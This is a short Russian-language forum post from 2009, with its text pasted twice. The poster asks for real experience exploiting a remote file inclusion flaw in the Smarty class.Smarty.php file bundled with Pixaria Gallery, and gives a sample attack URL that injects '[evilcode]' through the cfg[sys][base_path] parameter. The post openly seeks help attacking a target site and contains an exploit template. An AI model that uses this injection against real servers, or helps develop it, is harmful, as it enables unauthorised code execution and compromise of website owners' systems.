ed_gein
27.08.2009, 20:31
задача...есть Pixaria Gallery
к ней прикручен шаблонизатор Smarty Template Engine
у смарти есть ряд уязвисмостей одна из которых
(class.Smarty.php) Remote File Include Vulnerability
есть у кого-то реальный опыт использования данной уязвимости???
примерный синтаксис следующий
http://www.target.com/resources/includes/class.Smarty.php?cfg[sys][base_path]=[evilcode]
к ней прикручен шаблонизатор Smarty Template Engine
у смарти есть ряд уязвисмостей одна из которых
(class.Smarty.php) Remote File Include Vulnerability
есть у кого-то реальный опыт использования данной уязвимости???
примерный синтаксис следующий
http://www.target.com/resources/includes/class.Smarty.php?cfg[sys][base_path]=[evilcode]